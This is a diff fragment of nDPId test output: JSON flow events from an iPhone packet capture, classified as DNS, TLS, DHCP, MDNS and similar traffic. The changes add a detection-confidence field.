+00632{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454599054,"flow_last_seen":1582454599054,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.22","l4_proto":2,"flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53272,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53317,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
+00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595352,"flow_last_seen":1582454596370,"flow_idle_time":180000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":600,"flow_avg_l4_payload_len":300,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.17","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1582454598385,"flow_last_seen":1582454599058,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5314,"flow_avg_l4_payload_len":295,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.130.2.46","src_port":50577,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454552576,"flow_last_seen":1582454582628,"flow_idle_time":180000,"flow_min_l4_payload_len":510,"flow_max_l4_payload_len":510,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454598412,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":102,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1582454598766,"flow_last_seen":1582454598934,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5815,"flow_avg_l4_payload_len":484,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.122.252.82","src_port":50582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454585624,"flow_last_seen":1582454585624,"flow_idle_time":180000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454553607,"flow_last_seen":1582454586688,"flow_idle_time":180000,"flow_min_l4_payload_len":362,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1881,"flow_avg_l4_payload_len":627,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::c42c:3ff:fe60:6a64","dst_ip":"ff02::fb","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00637{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1582454595354,"flow_last_seen":1582454595354,"flow_idle_time":120000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff98:a29c","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1582454599934,"flow_last_seen":1582454600426,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9568,"flow_avg_l4_payload_len":281,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}}
 00583{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454560698,"flow_last_seen":1582454560698,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.1","src_port":5351,"dst_port":5350,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00568{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454560698,"flow_last_seen":1582454560698,"flow_idle_time":180000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":18,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.1","src_port":5351,"dst_port":5350,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00573{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598373,"flow_last_seen":1582454599396,"flow_idle_time":180000,"flow_min_l4_payload_len":66,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553606,"flow_last_seen":1582454586688,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1926,"flow_avg_l4_payload_len":481,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"MDNS","breed":"Acceptable","category":"Network"}}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454556158,"flow_last_seen":1582454586170,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Spotify","breed":"Acceptable","category":"Music"}}
-00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
-00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599073,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52031,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
-00646{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598416,"flow_last_seen":1582454600719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5836,"flow_avg_l4_payload_len":291,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
-00646{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1582454598418,"flow_last_seen":1582454600719,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":5858,"flow_avg_l4_payload_len":292,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":50579,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454598377,"flow_last_seen":1582454598754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9046,"flow_avg_l4_payload_len":335,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.25.53","src_port":50576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":28,"flow_first_seen":1582454600508,"flow_last_seen":1582454600678,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9599,"flow_avg_l4_payload_len":342,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"}}
-00640{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598760,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":100,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62526,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
-00648{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1582454598387,"flow_last_seen":1582454598716,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":696,"flow_tot_l4_payload_len":827,"flow_avg_l4_payload_len":91,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.253.105.202","src_port":49152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Apple","breed":"Safe","category":"ConnCheck"}}
-00625{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454596364,"flow_last_seen":1582454597360,"flow_idle_time":120000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":68,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00622{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454595354,"flow_last_seen":1582454599568,"flow_idle_time":120000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":12,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip6","src_ip":"fe80::823:3f17:8298:a29c","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598755,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52682,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1582454553606,"flow_last_seen":1582454586688,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":1157,"flow_tot_l4_payload_len":1926,"flow_avg_l4_payload_len":481,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454556158,"flow_last_seen":1582454586170,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}}
+00665{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598756,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":93,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":65,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":64203,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
+00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454599065,"flow_last_seen":1582454599105,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":62160,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598759,"flow_idle_time":180000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":49880,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598713,"flow_last_seen":1582454598758,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":53983,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"}}
